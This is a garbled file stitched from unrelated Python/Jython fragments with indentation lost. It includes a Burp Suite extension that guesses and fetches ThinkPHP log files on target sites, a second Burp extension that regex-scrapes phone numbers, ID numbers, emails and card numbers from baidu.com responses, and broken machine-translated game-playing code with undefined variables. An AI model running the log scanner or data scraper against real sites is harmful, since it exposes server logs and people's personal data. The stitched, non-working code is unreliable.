def registerExtenderCallbacks(self, callbacks):
self.messages = []
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
self._callbacks.setExtensionName('TPLogScan')
self._log = ArrayList()
self._lock = Lock()
self.jSplitPaneV = JSplitPane(JSplitPane.VERTICAL_SPLIT, True)
self.jSplitPaneV.setDividerLocation(300)
self.jSplitPaneV.setOneTouchExpandable(True)
self.jPanel_top = JPanel()
self.jTabbedPane = JTabbedPane(JTabbedPane.TOP)
self.iRequestTextEditor = self._callbacks.createMessageEditor(self, False)
self.iResponseTextEditor = self._callbacks.createMessageEditor(self, False)
self.jTable = CustomTable(self)
self.jTable.setShowGrid(True)
self.jTable.setAutoCreateRowSorter(True)
self.jTable.setAutoResizeMode(JTable.AUTO_RESIZE_SUBSEQUENT_COLUMNS)
first_column_model = self.jTable.getColumnModel().getColumn(0)
first_column_model.setPreferredWidth(60);
first_column_model.setMaxWidth(60)
first_column_model.setMinWidth(60)
self.jTable.getColumnModel().getColumn(1).setPreferredWidth(300)
third_column_model = self.jTable.getColumnModel().getColumn(2)
third_column_model.setPreferredWidth(100)
third_column_model.setMinWidth(100)
self.jTable.getColumnModel().getColumn(3).setPreferredWidth(600)
self.jTable.getColumnModel().getColumn(4).setPreferredWidth(100)
self.jTable.getColumnModel().getColumn(5).setPreferredWidth(100)
self.jScrollPane1 = JScrollPane(self.jTable)
self.jScrollPane1.setHorizontalScrollBarPolicy(ScrollPaneConstants.HORIZONTAL_SCROLLBAR_AS_NEEDED)
self.jScrollPane1.setVerticalScrollBarPolicy(ScrollPaneConstants.VERTICAL_SCROLLBAR_AS_NEEDED)
self.jTabbedPane.addTab("Log", self.jScrollPane1)
self.jPanel_top.add(self.jTabbedPane)
self.jPanel_top.setLayout(GridLayout(1,1))
self.jSplitPaneInfo = JSplitPane(JSplitPane.HORIZONTAL_SPLIT, True)
self.jSplitPaneInfo.setDividerLocation(650)
self.jSplitPaneInfo.setOneTouchExpandable(True)
self.jPanel_reqInfo_left = JPanel()
self.jPanel_respInfo_right = JPanel()
self.jPanel_reqInfo_left.setLayout(BorderLayout())
self.jPanel_respInfo_right.setLayout(BorderLayout())
self.jPanel_reqInfo_left.add(self.iRequestTextEditor.getComponent(),
BorderLayout.CENTER)
self.jPanel_respInfo_right.add(self.iResponseTextEditor.getComponent(),
BorderLayout.CENTER)
self.jSplitPaneInfo.add(self.jPanel_reqInfo_left, JSplitPane.LEFT)
self.jSplitPaneInfo.add(self.jPanel_respInfo_right, JSplitPane.RIGHT)
self.jSplitPaneV.add(self.jPanel_top, JSplitPane.TOP)
self.jSplitPaneV.add(self.jSplitPaneInfo, JSplitPane.BOTTOM)
self._callbacks.customizeUiComponent(self.jSplitPaneV)
self._callbacks.customizeUiComponent(self.jPanel_top)
self._callbacks.customizeUiComponent(self.jTabbedPane)
self._callbacks.customizeUiComponent(self.jTable)
self._callbacks.customizeUiComponent(self.jScrollPane1)
self._callbacks.customizeUiComponent(self.jSplitPaneInfo)
self._callbacks.customizeUiComponent(self.jPanel_reqInfo_left)
self._callbacks.customizeUiComponent(self.jPanel_respInfo_right)
self._callbacks.addSuiteTab(self)
self._callbacks.registerHttpListener(self)
self._callbacks.registerContextMenuFactory(self)
return
def getTabCaption(self):
return 'TPLogScan'
def getUiComponent(self):
return self.jSplitPaneV
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 6
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "#"
if columnIndex == 1:
return "Host"
if columnIndex == 2:
return "Method"
if columnIndex == 3:
return "URL"
if columnIndex == 4:
return "Status"
if columnIndex == 5:
return "Length"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
url = logEntry._url.toString()
url_parse = urlparse.urlparse(url)
if url_parse.netloc.find(':') != -1:
netloc = url_parse.netloc[:url_parse.netloc.find(':')]
host = url_parse.scheme + '://' + netloc
path = url_parse.path
if columnIndex == 0:
return rowIndex+1
if columnIndex == 1:
return host
if columnIndex == 2:
return logEntry._method
if columnIndex == 3:
return path
if columnIndex == 4:
return logEntry._status_code
if columnIndex == 5:
return logEntry._length
return ""
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
# tool_name = self._callbacks.getToolName(toolFlag)
# if tool_name != 'Extender':
if toolFlag != 1024:
return
if messageIsRequest:
return
request_info = self._helpers.analyzeRequest(messageInfo)
response_info = self._helpers.analyzeResponse(messageInfo.getResponse())
response_headers = response_info.getHeaders()
response_length = 0
for header in response_headers:
header = header.encode('utf-8')
if header.startswith("Content-Length"):
response_length = int(header.replace('Content-Length: ', ''))
length = response_length if response_length > 0 else 0
self._lock.acquire()
row = self._log.size()
self._log.add(LogEntry(toolFlag, self._callbacks.saveBuffersToTempFiles(messageInfo), request_info.getUrl(),request_info.getMethod(),response_info.getStatusCode(),length))
self.fireTableRowsInserted(row, row)
self._lock.release()
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
def loadMenus(self):
self.menus = []
self.mainMenu = JMenu("TPLogScan")
self.menus.append(self.mainMenu)
menu = JMenuItem('ThinkPHP v3', None, actionPerformed=lambda x: self.eventHandler(x))
self.mainMenu.add(menu)
menu = JMenuItem('ThinkPHP v5', None, actionPerformed=lambda x: self.eventHandler(x))
self.mainMenu.add(menu)
def createMenuItems(self, invocation):
self.loadMenus()
self.messages = invocation.getSelectedMessages()
return self.menus if self.menus else None
def eventHandler(self, x):
menuName = x.getSource().text
if menuName == 'ThinkPHP v3':
version = 3
elif menuName == 'ThinkPHP v5':
version = 5
else:
print("chose error")
return
for message in self.messages:
url = str(self._helpers.analyzeRequest(message).getUrl())
url_parse = urlparse.urlparse(url)
url = url_parse.scheme + '://' + url_parse.netloc
print("[*] url: {}".format(url))
datetime_now = datetime.datetime.now()
year = (datetime_now - datetime.timedelta(days=30)).year
month = (datetime_now - datetime.timedelta(days=30)).month
day = (datetime_now - datetime.timedelta(days=30)).day
tplogscan = TPLogScan(url, version, year, month, day)
log_path = tplogscan.checkLogPath()
if not log_path:
print("[-] {} can't get log file! ".format(url))
self._callbacks.issueAlert("{} can't get log file".format(url))
return
filename_list = tplogscan.genFileName()
t = threading.Thread(target=self.logScan, args=(message, version, log_path, filename_list))
t.start()
def logScan(self, message, version, log_path, filename_list):
http_service = message.getHttpService()
old_request = self._helpers.bytesToString(message.getRequest())
old_path = self._helpers.analyzeRequest(message).getUrl().getPath()
for filename in filename_list:
try:
new_request = old_request.replace(" " + old_path + " HTTP/", " " + log_path+filename + " HTTP/")
response, status_code = self.sendRequest(http_service, new_request)
if status_code != 200:
continue
tmp_filename = filename
now_filename = ''
pattern = re.compile(r"\[ (\d{4}-\d{2}-\d{2})T((\d{2}:){2}\d{2})\+08:00 \]")
flag = True
while flag:
match_result = pattern.search(response)
if not match_result:
break
time_str = match_result.group(1) + ' ' + match_result.group(2)
timeArray = time.strptime(time_str, "%Y-%m-%d %H:%M:%S")
timestamp = int(time.mktime(timeArray))
timestamp_list = [str(timestamp), str(timestamp-1), str(timestamp-2), str(timestamp-3)]
for timestamp in timestamp_list:
if version == 3:
tmp_filename = timestamp + '-' + filename
else:
tmp_filename = filename[:filename.find('/')] + '/' + timestamp + '-' + filename[filename.find('/')+1:]
if tmp_filename == now_filename:
flag = False
break
new_request = old_request.replace(" " + old_path + " HTTP/", " " + log_path+tmp_filename + " HTTP/")
response, status_code = self.sendRequest(http_service, new_request)
if status_code == 200:
now_filename = tmp_filename
break
except Exception as e:
print("[-] error: {}".format(e))
print('[*] Log Scan complete!')
def sendRequest(self, http_service, new_request):
checkRequestResponse = self._callbacks.makeHttpRequest(http_service, self._helpers.stringToBytes(new_request))
status_code = self._helpers.analyzeResponse(checkRequestResponse.getResponse()).getStatusCode()
print('[*] {} | {}'.format(self._helpers.analyzeRequest(checkRequestResponse).getUrl(), status_code))
return self._helpers.bytesToString(checkRequestResponse.getResponse()), status_code
class BurpExtender(IBurpExtender, ITab, AbstractTableModel ):
def registerExtenderCallbacks(self, callbacks):
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
callbacks.setExtensionName("JS issues processor")
#callbacks.registerHttpListener(self)
self._issues = ArrayList()
#self._lock = Lock()
# main split pane
self._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
# table of log entries
logTable = Table(self)
scrollPane = JScrollPane(logTable)
self._splitpane.setLeftComponent(scrollPane)
self._texteditor = callbacks.createTextEditor()
#self._text = JTextArea(5, 80)
textpane = JScrollPane(self._texteditor.getComponent())
self._splitpane.setRightComponent(textpane)
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(logTable)
#callbacks.customizeUiComponent()
callbacks.customizeUiComponent(textpane)
callbacks.addSuiteTab(self)
print("[+] Reading current scanner issues")
issues = callbacks.getScanIssues("https://www.example.com/")
ip = IssueParser()
for i in issues:
if re.match("^The JavaScript file",i.getIssueName()):
#print(i.getIssueName())
#print(i.getUrl().toString())
ip.parseIssue(i)
#self._lock.acquire()
row = self._issues.size()
self._issues.add(IssueEntry(i) )
self.fireTableRowsInserted(row, row)
#self._lock.release()
print("JS Libs Report:")
print(ip.genReport())
return
#
# implement ITab
#
def getTabCaption(self):
return "JS Issues"
def getUiComponent(self):
return self._splitpane
#
# extend AbstractTableModel
#
def getRowCount(self):
try:
return self._issues.size()
except:
return 0
def getColumnCount(self):
return 2
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "Name"
if columnIndex == 1:
return "URL"
return ""
def getValueAt(self, rowIndex, columnIndex):
entry = self._issues.get(rowIndex)
if columnIndex == 0:
return entry.getName()
if columnIndex == 1:
return entry.getUrl()
return ""
class IterationOrderCandidate(Comparable, IterationOrderCandidate):
""" generated source for class IterationOrderCandidate """
# Information specific to this ordering
sourceConjunctIndices = List()
# Which conjuncts are we using as sources, and in what order?
varOrdering = List()
# In what order do we assign variables?
functionalConjunctIndices = List()
# Same size as varOrdering
# Index of conjunct if functional, -1 otherwise
varSources = List()
# Same size as varOrdering
# For each variable: Which source conjunct
# originally contributes it? -1 if none
# Becomes sourceResponsibleForVar
# Information shared by the orderings
# Presumably, this will also be used to construct the iterator to be used...
varsToAssign = List()
sourceConjunctCandidates = List()
sourceConjunctSizes = List()
# same indexing as candidates
functionalSentences = List()
functionalSentencesInfo = List()
# Indexing same as functionalSentences
varDomainSizes = Map()
#
# * This constructor is for creating the start node of the
# * search. No part of the ordering is specified.
# *
# * @param sourceConjunctCandidates
# * @param sourceConjunctSizes
# * @param functionalSentences
# * @param functionalSentencesInfo
# * @param allVars
# * @param varDomainSizes
#
@overloaded
def __init__(self, varsToAssign, sourceConjunctCandidates, sourceConjunctSizes, functionalSentences, functionalSentencesInfo, varDomainSizes):
""" generated source for method __init__ """
super(IterationOrderCandidate, self).__init__()
self.sourceConjunctIndices = ArrayList()
self.varOrdering = ArrayList()
self.functionalConjunctIndices = ArrayList()
self.varSources = ArrayList()
self.varsToAssign = varsToAssign
self.sourceConjunctCandidates = sourceConjunctCandidates
self.sourceConjunctSizes = sourceConjunctSizes
self.functionalSentences = functionalSentences
self.functionalSentencesInfo = functionalSentencesInfo
self.varDomainSizes = varDomainSizes
def getFunctionalConjuncts(self):
""" generated source for method getFunctionalConjuncts """
# Returns, for each var, the conjunct defining it (if any)
functionalConjuncts = ArrayList(len(self.functionalConjunctIndices))
for index in functionalConjunctIndices:
if index == -1:
functionalConjuncts.add(None)
else:
functionalConjuncts.add(self.functionalSentences.get(index))
return functionalConjuncts
def getSourceConjuncts(self):
""" generated source for method getSourceConjuncts """
# These are the selected source conjuncts, not just the candidates.
sourceConjuncts = ArrayList(len(self.sourceConjunctIndices))
for index in sourceConjunctIndices:
sourceConjuncts.add(self.sourceConjunctCandidates.get(index))
return sourceConjuncts
def getVariableOrdering(self):
""" generated source for method getVariableOrdering """
return self.varOrdering
#
# * This constructor is for "completing" the ordering by
# * adding all remaining variables, in some arbitrary order.
# * No source conjuncts or functions are added.
#
@__init__.register(object, IterationOrderCandidate)
def __init___0(self, parent):
""" generated source for method __init___0 """
super(IterationOrderCandidate, self).__init__()
# Shared rules
self.varsToAssign = parent.varsToAssign
self.sourceConjunctCandidates = parent.sourceConjunctCandidates
self.sourceConjunctSizes = parent.sourceConjunctSizes
self.functionalSentences = parent.functionalSentences
self.functionalSentencesInfo = parent.functionalSentencesInfo
self.varDomainSizes = parent.varDomainSizes
# Individual rules:
# We can share this because we won't be adding to it
self.sourceConjunctIndices = parent.sourceConjunctIndices
# These others we'll be adding to
self.varOrdering = ArrayList(parent.varOrdering)
self.functionalConjunctIndices = ArrayList(parent.functionalConjunctIndices)
self.varSources = ArrayList(parent.varSources)
# Fill out the ordering with all remaining variables: Easy enough
for var in varsToAssign:
if not self.varOrdering.contains(var):
self.varOrdering.add(var)
self.functionalConjunctIndices.add(-1)
self.varSources.add(-1)
#
# * This constructor is for adding a source conjunct to an
# * ordering.
# * @param i The index of the source conjunct being added.
#
@__init__.register(object, IterationOrderCandidate, int)
def __init___1(self, parent, i):
""" generated source for method __init___1 """
super(IterationOrderCandidate, self).__init__()
# Shared rules:
self.varsToAssign = parent.varsToAssign
self.sourceConjunctCandidates = parent.sourceConjunctCandidates
self.sourceConjunctSizes = parent.sourceConjunctSizes
self.functionalSentences = parent.functionalSentences
self.functionalSentencesInfo = parent.functionalSentencesInfo
self.varDomainSizes = parent.varDomainSizes
# Individual rules:
self.sourceConjunctIndices = ArrayList(parent.sourceConjunctIndices)
self.varOrdering = ArrayList(parent.varOrdering)
self.functionalConjunctIndices = ArrayList(parent.functionalConjunctIndices)
self.varSources = ArrayList(parent.varSources)
# Add the new source conjunct
self.sourceConjunctIndices.add(i)
sourceConjunctCandidate = self.sourceConjunctCandidates.get(i)
varsFromConjunct = GdlUtils.getVariables(sourceConjunctCandidate)
# Ignore both previously added vars and duplicates
# Oh, but we need to be careful here, at some point.
# i.e., what if there are multiple of the same variable
# in a single statement?
# That should probably be handled later.
for var in varsFromConjunct:
if not self.varOrdering.contains(var):
self.varOrdering.add(var)
self.varSources.add(i)
self.functionalConjunctIndices.add(-1)
#
# * This constructor is for adding a function to the ordering.
#
@__init__.register(object, IterationOrderCandidate, GdlSentence, int, GdlVariable)
def __init___2(self, parent, functionalSentence, functionalSentenceIndex, functionOutput):
""" generated source for method __init___2 """
super(IterationOrderCandidate, self).__init__()
# Shared rules:
self.varsToAssign = parent.varsToAssign
self.sourceConjunctCandidates = parent.sourceConjunctCandidates
self.sourceConjunctSizes = parent.sourceConjunctSizes
self.functionalSentences = parent.functionalSentences
self.functionalSentencesInfo = parent.functionalSentencesInfo
self.varDomainSizes = parent.varDomainSizes
# Individual rules:
self.sourceConjunctIndices = ArrayList(parent.sourceConjunctIndices)
self.varOrdering = ArrayList(parent.varOrdering)
self.functionalConjunctIndices = ArrayList(parent.functionalConjunctIndices)
self.varSources = ArrayList(parent.varSources)
# And we add the function
varsInFunction = GdlUtils.getVariables(functionalSentence)
# First, add the remaining arguments
for var in varsInFunction:
if not self.varOrdering.contains(var) and not var == functionOutput and self.varsToAssign.contains(var):
self.varOrdering.add(var)
self.functionalConjunctIndices.add(-1)
self.varSources.add(-1)
# Then the output
self.varOrdering.add(functionOutput)
self.functionalConjunctIndices.add(functionalSentenceIndex)
self.varSources.add(-1)
def getHeuristicValue(self):
""" generated source for method getHeuristicValue """
heuristic = 1
for sourceIndex in sourceConjunctIndices:
heuristic *= self.sourceConjunctSizes.get(sourceIndex)
v = 0
while v < len(self.varOrdering):
if self.varSources.get(v) == -1 and self.functionalConjunctIndices.get(v) == -1:
# It's not set by a source conjunct or a function
heuristic *= self.varDomainSizes.get(self.varOrdering.get(v))
v += 1
# We want complete orderings to show up faster
# so we add a little incentive to pick them
# Add 1 to the value of non-complete orderings
if len(self.varOrdering) < len(self.varsToAssign):
heuristic += 1
# print "Heuristic value is " + heuristic + " with functionalConjunctIndices " + functionalConjunctIndices;
return heuristic
def isComplete(self):
""" generated source for method isComplete """
return self.varOrdering.containsAll(self.varsToAssign)
def getChildren(self, analyticFunctionOrdering):
""" generated source for method getChildren """
allChildren = ArrayList()
allChildren.addAll(getSourceConjunctChildren())
allChildren.addAll(getFunctionAddedChildren(analyticFunctionOrdering))
# print "Number of children being added: " + len(allChildren);
return allChildren
def getSourceConjunctChildren(self):
""" generated source for method getSourceConjunctChildren """
children = ArrayList()
# If we are already using functions, short-circuit to cut off
# repetition of the search space
for index in functionalConjunctIndices:
if index != -1:
return Collections.emptyList()
# This means we want a reference to the original list of conjuncts.
lastSourceConjunctIndex = -1
if not self.sourceConjunctIndices.isEmpty():
lastSourceConjunctIndex = self.sourceConjunctIndices.get(len(self.sourceConjunctIndices) - 1)
i = lastSourceConjunctIndex + 1
while i < len(self.sourceConjunctCandidates):
children.add(IterationOrderCandidate(self, i))
i += 1
return children
def getFunctionAddedChildren(self, analyticFunctionOrdering):
""" generated source for method getFunctionAddedChildren """
# We can't just add those functions that
# are "ready" to be added. We should be adding all those variables
# "leading up to" the functions and then applying the functions.
# We can even take this one step further by only adding one child
# per remaining constant function; we choose as our function output the
# variable that is a candidate for functionhood that has the
# largest domain, or one that is tied for largest.
# New criterion: Must also NOT be in preassignment.
children = ArrayList()
# It would be really nice here to just analytically choose
# the set of functions we're going to use.
# Here's one approach for doing that:
# For each variable, get a list of the functions that could
# potentially produce it.
# For all the variables with no functions, add them.
# Then repeatedly find the function with the fewest
# number of additional variables (hopefully 0!) needed to
# specify it and add it as a function.
# The goal here is not to be optimal, but to be efficient!
# Certain games (e.g. Pentago) break the old complete search method!
# TODO: Eventual possible optimization here:
# If something is dependent on a connected component that it is
# not part of, wait until the connected component is resolved
# (or something like that...)
if analyticFunctionOrdering and len(self.functionalSentencesInfo) > 8:
# For each variable, a list of functions
# (refer to functions by their indices)
# and the set of outstanding vars they depend on...
# We start by adding to the varOrdering the vars not produced by functions
# First, we have to find them
while i < len(self.functionalSentencesInfo):
for producibleVar in producibleVars:
if not functionsProducingVars.containsKey(producibleVar):
functionsProducingVars.put(producibleVar, HashSet())
functionsProducingVars.get(producibleVar).add(i)
i += 1
# Non-producible vars get iterated over before we start
# deciding which functions to add
for var in varsToAssign:
if not self.varOrdering.contains(var):
if not functionsProducingVars.containsKey(var):
# Add var to the ordering
self.varOrdering.add(var)
self.functionalConjunctIndices.add(-1)
self.varSources.add(-1)
# Map is from potential set of dependencies to function indices
# Create this map...
while i < len(self.functionalSentencesInfo):
# Variables already in varOrdering don't go in dependents list
producibleVars.removeAll(self.varOrdering)
allVars.removeAll(self.varOrdering)
for producibleVar in producibleVars:
dependencies.addAll(allVars)
dependencies.remove(producibleVar)
if not functionsHavingDependencies.containsKey(dependencies):
functionsHavingDependencies.put(dependencies, HashSet())
functionsHavingDependencies.get(dependencies).add(i)
i += 1
# Now, we can keep creating functions to generate the remaining variables
while len(self.varOrdering) < len(self.varsToAssign):
if functionsHavingDependencies.isEmpty():
raise RuntimeException("We should not run out of functions we could use")
# Find the smallest set of dependencies
if functionsHavingDependencies.containsKey(Collections.emptySet()):
dependencySetToUse = Collections.emptySet()
else:
for dependencySet in functionsHavingDependencies.keySet():
if len(dependencySet) < smallestSize:
smallestSize = len(dependencySet)
dependencySetToUse = dependencySet
# See if any of the functions are applicable
for function_ in functions:
producibleVars.removeAll(dependencySetToUse)
producibleVars.removeAll(self.varOrdering)
if not producibleVars.isEmpty():
functionToUse = function_
varProduced = producibleVars.iterator().next()
break
if functionToUse == -1:
# None of these functions were actually useful now?
# Dump the dependency set
functionsHavingDependencies.remove(dependencySetToUse)
else:
# Apply the function
# 1) Add the remaining dependencies as iterated variables
for var in dependencySetToUse:
self.varOrdering.add(var)
self.functionalConjunctIndices.add(-1)
self.varSources.add(-1)
# 2) Add the function's produced variable (varProduced)
self.varOrdering.add(varProduced)
self.functionalConjunctIndices.add(functionToUse)
self.varSources.add(-1)
# 3) Remove all vars added this way from all dependency sets
addedVars.addAll(dependencySetToUse)
addedVars.add(varProduced)
# Tricky, because we have to merge sets
# Easier to use a new map
for entry in functionsHavingDependencies.entrySet():
newKey.removeAll(addedVars)
if not newFunctionsHavingDependencies.containsKey(newKey):
newFunctionsHavingDependencies.put(newKey, HashSet())
newFunctionsHavingDependencies.get(newKey).addAll(entry.getValue())
functionsHavingDependencies = newFunctionsHavingDependencies
# 4) Remove this function from the lists?
for functionSet in functionsHavingDependencies.values():
functionSet.remove(functionToUse)
# Now we need to actually return the ordering in a list
# Here's the quick way to do that...
# (since we've added all the new stuff to ourself already)
return Collections.singletonList(IterationOrderCandidate(self))
else:
# Let's try a new technique for restricting the space of possibilities...
# We already have an ordering on the functions
# Let's try to constrain things to that order
# Namely, if i<j and constant form j is already used as a function,
# we cannot use constant form i UNLESS constant form j supplies
# as its variable something used by constant form i.
# We might also try requiring that c.f. i NOT provide a variable
# used by c.f. j, though there may be multiple possibilities as
# to what it could provide.
if not self.functionalConjunctIndices.isEmpty():
lastFunctionUsedIndex = Collections.max(self.functionalConjunctIndices)
while i < len(self.functionalConjunctIndices):
if self.functionalConjunctIndices.get(i) != -1:
varsProducedByFunctions.add(self.varOrdering.get(i))
i += 1
while i < len(self.functionalSentencesInfo):
if i < lastFunctionUsedIndex:
# We need to figure out whether i could use any of the
# vars we're producing with functions
# TODO: Try this with a finer grain
# i.e., see if i needs a var from a function that is after
# it, not one that might be before it
if Collections.disjoint(varsInSentence, varsProducedByFunctions):
continue
# What is the best variable to grab from this form, if there are any?
if bestVariable == None:
continue
children.add(newCandidate)
i += 1
# If there are no more functions to add, add the completed version
if children.isEmpty():
children.add(IterationOrderCandidate(self))
return children
def getBestVariable(self, functionalSentence, functionInfo):
""" generated source for method getBestVariable """
# If all the variables that can be set by the functional sentence are in
# the varOrdering, we return null. Otherwise, we return one of
# those with the largest domain.
# The FunctionInfo is sentence-independent, so we need the context
# of the sentence (which has variables in it).
tuple_ = GdlUtils.getTupleFromSentence(functionalSentence)
dependentSlots = functionInfo.getDependentSlots()
if len(tuple_) != len(dependentSlots):
raise RuntimeException("Mismatched sentence " + functionalSentence + " and constant form " + functionInfo)
candidateVars = HashSet()
i = 0
while i < len(tuple_):
if isinstance(term, (GdlVariable, )) and dependentSlots.get(i) and not self.varOrdering.contains(term) and self.varsToAssign.contains(term):
candidateVars.add(term)
i += 1
# Now we look at the domains, trying to find the largest
bestVar = None
bestDomainSize = 0
for var in candidateVars:
if domainSize > bestDomainSize:
bestVar = var
bestDomainSize = domainSize
return bestVar
# null if none are usable
# This class has a natural ordering that is inconsistent with equals.
def compareTo(self, o):
""" generated source for method compareTo """
diff = self.getHeuristicValue() - o.getHeuristicValue()
if diff < 0:
return -1
elif diff == 0:
return 0
else:
return 1
def __str__(self):
""" generated source for method toString """
return self.varOrdering.__str__() + " with sources " + self.getSourceConjuncts().__str__() + "; functional?: " + self.functionalConjunctIndices + "; domain sizes are " + self.varDomainSizes
class BurpExtender(IBurpExtender, ITab, IHttpListener,
IMessageEditorController, AbstractTableModel):
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
# keep a reference to our callbacks object
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("sensitive")
# create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
self._urls = []
# main split pane
self._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
# table of log entries
logTable = Table(self)
scrollPane = JScrollPane(logTable)
self._splitpane.setLeftComponent(scrollPane)
# tabs with request/response viewers
tabs = JTabbedPane()
self._requestViewer = callbacks.createMessageEditor(self, False)
self._responseViewer = callbacks.createMessageEditor(self, False)
tabs.addTab("Request", self._requestViewer.getComponent())
tabs.addTab("Response", self._responseViewer.getComponent())
self._splitpane.setRightComponent(tabs)
# customize our UI components
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(scrollPane)
callbacks.customizeUiComponent(tabs)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register ourselves as an HTTP listener
callbacks.registerHttpListener(self)
return
#
# implement ITab
#
def getTabCaption(self):
return "sensitive"
def getUiComponent(self):
return self._splitpane
#
# implement IHttpListener
#
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
# only process requests
if messageIsRequest:
return
# 敏感信息
# 只查找百度域名
if 'baidu.com' in str(messageInfo.getUrl()):
# 接口去重
if self._helpers.analyzeRequest(
messageInfo).getUrl() not in self._urls:
bodyStr = messageInfo.getResponse().tostring()
retel = re.compile(
r'(\W(13[0-9]|14[57]|15[012356789]|17[0-9]|18[012356789])\d{8}\W)'
)
reip = re.compile(
r'(((25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d)))\.){3}(25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d))))'
)
recardid = re.compile(r'(\W(\d{15}|\d{18})[X]?\W)')
reemail = re.compile(
r'(\W[A-Za-z0-9\u4e00-\u9fa5]+@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+\W)'
)
recardbin = re.compile(r'((\W[1-9]{1})(\d{15}|\d{18})\W)')
tel = retel.findall(bodyStr)
ip = reip.findall(bodyStr)
cardid = recardid.findall(bodyStr)
email = reemail.findall(bodyStr)
cardbin = recardbin.findall(bodyStr)
# create a new log entry with the message details
if len(tel) | len(cardid) | len(ip) | len(email) | len(
cardbin):
self._urls.append(
self._helpers.analyzeRequest(messageInfo).getUrl())
sensitive = ''
if tel:
tels = '{tel:'
for i in range(len(tel)):
tels = tels + tel[i][0]
tels = tels + '} '
sensitive = sensitive + tels
if ip:
ips = '{ip:'
for i in range(len(ip)):
ips = ips + ip[i][0] + '/'
ips = ips + '} '
sensitive = sensitive + ips
if cardid:
cardids = '{cardid:'
for i in range(len(cardid)):
cardids = cardids + cardid[i][0]
cardids = cardids + '} '
sensitive = sensitive + cardids
if email:
emails = '{email:'
for i in range(len(email)):
emails = emails + email[i][0]
emails = emails + '} '
sensitive = sensitive + emails
if cardbin:
cardbins = '{cardbin:'
for i in range(len(cardbin)):
cardbins = cardbins + cardbin[i][0]
cardbins = cardbins + '} '
sensitive = sensitive + cardbins
time = datetime.datetime.now().strftime('%Y%m%d %H:%M:%S')
self._lock.acquire()
row = self._log.size()
self._log.add(
LogEntry(
toolFlag,
self._callbacks.saveBuffersToTempFiles(
messageInfo),
self._helpers.analyzeRequest(messageInfo).getUrl(),
sensitive, time))
self.fireTableRowsInserted(row, row)
self._lock.release()
#
# extend AbstractTableModel
#
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 4
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "time"
if columnIndex == 1:
return "tools"
if columnIndex == 2:
return "url"
if columnIndex == 3:
return "sensitive"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return logEntry._time
if columnIndex == 1:
return self._callbacks.getToolName(logEntry._tool)
if columnIndex == 2:
return logEntry._url.toString()
if columnIndex == 3:
return logEntry._sensitive
return ""
#
# implement IMessageEditorController
# this allows our request/response viewers to obtain details about the messages being displayed
#
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
def checkMachineConsistency(cls, theReference, theSubject, timeToSpend):
""" generated source for method checkMachineConsistency """
startTime = System.currentTimeMillis()
GamerLogger.log("StateMachine", "Performing automatic consistency testing on " + theSubject.__class__.__name__ + " using " + theReference.__class__.__name__ + " as a reference.")
theMachines = ArrayList()
theMachines.add(theReference)
theMachines.add(theSubject)
GamerLogger.emitToConsole("Consistency checking: [")
nRound = 0
while True:
nRound += 1
GamerLogger.emitToConsole(".")
while i < len(theMachines):
try:
theCurrentStates[i] = theMachines.get(i).getInitialState()
except Exception as e:
GamerLogger.log("StateMachine", "Machine #" + i + " failed to generate an initial state!")
return False
i += 1
while not theMachines.get(0).isTerminal(theCurrentStates[0]):
if System.currentTimeMillis() > startTime + timeToSpend:
break
# Do per-state consistency checks
while i < len(theMachines):
for theRole in theMachines.get(0).getRoles():
try:
if not (theMachines.get(i).getLegalMoves(theCurrentStates[i], theRole).size() == theMachines.get(0).getLegalMoves(theCurrentStates[0], theRole).size()):
GamerLogger.log("StateMachine", "Inconsistency between machine #" + i + " and ProverStateMachine over state " + theCurrentStates[0] + " vs " + theCurrentStates[i].getContents())
GamerLogger.log("StateMachine", "Machine #" + 0 + " has move count = " + theMachines.get(0).getLegalMoves(theCurrentStates[0], theRole).size() + " for player " + theRole)
GamerLogger.log("StateMachine", "Machine #" + i + " has move count = " + theMachines.get(i).getLegalMoves(theCurrentStates[i], theRole).size() + " for player " + theRole)
return False
except Exception as e:
GamerLogger.logStackTrace("StateMachine", e)
i += 1
try:
while i < len(theMachines):
try:
theCurrentStates[i] = theMachines.get(i).getNextState(theCurrentStates[i], theJointMove)
except Exception as e:
GamerLogger.logStackTrace("StateMachine", e)
i += 1
except Exception as e:
GamerLogger.logStackTrace("StateMachine", e)
if System.currentTimeMillis() > startTime + timeToSpend:
break
while i < len(theMachines):
if not theMachines.get(i).isTerminal(theCurrentStates[i]):
GamerLogger.log("StateMachine", "Inconsistency between machine #" + i + " and ProverStateMachine over terminal-ness of state " + theCurrentStates[0] + " vs " + theCurrentStates[i])
return False
for theRole in theMachines.get(0).getRoles():
try:
theMachines.get(0).getGoal(theCurrentStates[0], theRole)
except Exception as e:
continue
try:
